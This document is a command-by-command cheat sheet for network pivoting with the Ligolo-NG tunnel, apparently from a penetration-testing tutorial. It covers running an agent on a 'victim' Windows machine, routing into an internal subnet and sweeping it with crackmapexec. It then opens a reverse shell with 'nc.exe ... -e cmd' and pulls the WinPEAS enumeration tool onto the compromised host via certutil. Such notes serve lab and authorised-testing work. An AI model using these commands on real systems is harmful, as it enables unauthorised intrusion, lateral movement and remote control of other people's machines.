# https://www.youtube.com/watch?v=DM1B8S80EvQ
# Tunneling like a VPN with Ligolo-NG (advanced yet simple tool that uses a TUN connection).
# https://github.com/nicocha30/ligolo-ng/releases/tag/v0.4.4
# You need a proxy file for Linux (attacking machine) and 
# agent file (executed on the pivoting host - ex: Windows if your target is Windows)

#################################On Kali#########################################
# Creating the interface
sudo ip tuntap add user kali mode tun ligolo
# Enable the interface
sudo ip link set ligolo up

# Now you can run the ligolo proxy file -> $ ./proxy -h (help)
# This will start a proxy server listening on 0.0.0.0:port
./proxy -selfcert

#################################On Target Machine################################
# On the target machine (victim)
ligolo-agent.exe -connect <ip:port> -ignore-cert

##################################On the Agent####################################
# After a short wait you will get an agent joined to our Ligolo proxy. Type $ help
# Typing 'session' will show the sessions and you can select them by number.
session 1

# Through the agent you can type 'ipconfig' and pull the networking information, find internal networks
ipconfig

#################################On Kali##########################################
# Once you find a internal network you can set up the route
sudo ip route add 10.10.120.0/24 dev ligolo
ip route list # You should see your new pivot here

##################################On the Agent####################################
# Re-enter the agent, type session, and 'start' to start the tunnel.
session
start

#################################On Kali##########################################
# Check to see if network pivot is working (against the internal subnet), if it succeeds we have access.
crackmapexec smb 10.10.120.0/24

##################################On the Agent####################################
# In order to catch reverse shells using Ligolo
# we need to add a listener to our ligolo agent
# go back to our ligolo proxy and use the 'listener-add' command
# Any connection that comes through the agent forward it to our localhost at port 4444
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
listener_list # You can see your list of listeners

#################################On Kali##########################################
# Now you can open a listener on your Kali machine
rlwrap nc -lvnp 4444

#################################On The Windows Target############################
# On the Windows target machine you can run the following (we are sending a reverse shell to the listener)
# Because we have the listener set up with Ligolo it will redirect it to us
# We are using the IP of the internal machine
nc.exe -nv 10.10.120.131 1234 -e cmd

-------------------------------------------

# Now that we have our shell we want to be able to send files like WINPEAS (enumeration tools) to them
# We can do this by making another listener and directing it to our localhost at 80 (running our PY Web Server)
# This is basically a dedicated listener for file transfer
##################################On the Agent####################################
listener-add --addr 0.0.0.0:1235 --to 127.0.0.1:80
listener_list

#################################On Kali##########################################
# Start your web server
python3 -m http.server 80

#################################On The Windows Target REVERSE SHELL############################
# Any connections coming through this address goes to our Python3 Web Server at Port 80
# This should reflect in our Python3 Web Server
certutil -urlcache -f http://0.0.0.0:1235/winpeas64.exe winpeas64.exe
